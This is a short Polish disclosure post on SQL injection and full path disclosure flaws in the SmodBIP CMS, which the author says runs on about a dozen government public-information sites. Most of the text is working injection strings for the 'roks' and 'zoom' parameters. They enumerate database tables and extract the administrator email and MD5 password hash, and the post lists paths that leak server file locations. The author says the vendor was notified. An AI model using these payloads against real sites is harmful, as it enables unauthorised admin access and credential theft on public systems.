Na atak poddatna jest najnowsza wersja SmodBIP jak i również wersja 1.10. Nie wiem jak sprawa ma się z niższymi.
SQL INJECTION
Kod:
index.php?id=11&roks=[sql injection]
index.php?id=11&zoom=[sql injection]
FULL PATH DISCLOSURE
Kod:
php/auctionlook.php
php/foot.php
php/menu.php
php/redakcja.php
php/sitemap.php
php/stat.php
php/top.php
php/top_menu.php
php/winieta.php
edytor/php/foot.php
edytor/php/ses.php
edytor/php/top.php
Przykladowe wykorzystanie:
Kod:
index.php?id=11&zoom=0 union select 1,2,3,4,5,6,7,8,9,0,0 /*
index.php?id=11&roks=0 union select 1,2,3,4,5,6,7,8,9,0,0 /*
Kod:
index.php?id=11&zoom=0 union select 1,2,3,table_name,5,6,7,8,9,0,0 from INFORMATION_SCHEMA.TABLES /*
^^ W ten sposob mozemy dowiedziec sie jakie tabele znajduja w bazie danych.
Kod:
index.php?id=11&zoom=0 or 1=1 union select 1,Email,3,haslo,5,6,7,8,9,0,0 from bip_SmodBIP_admin /*
^ Przykladowe zapytanie wyciagajace z tabeli "bip_SmodBIP_admin" adres e-mail (ktory jest potrzebny do zalogowania sie do panelu administracyjnego) oraz hasło zhaszowane w md5.
Zagrozenie?
Bardzo duże. W kilka chwil wprawiony atakujacy może uzyskac dostep do panelu administracyjnego.
Warto dodać ze skrypt obsluguje kilkanaście BIPów, w domenach rządowych.
Autor został skryptu powiadomiony.
Btw, czy w świetle prawa, publikując coś takiego łamię prawo?
Serdecznie pozdrawiam,
Adrian Piętka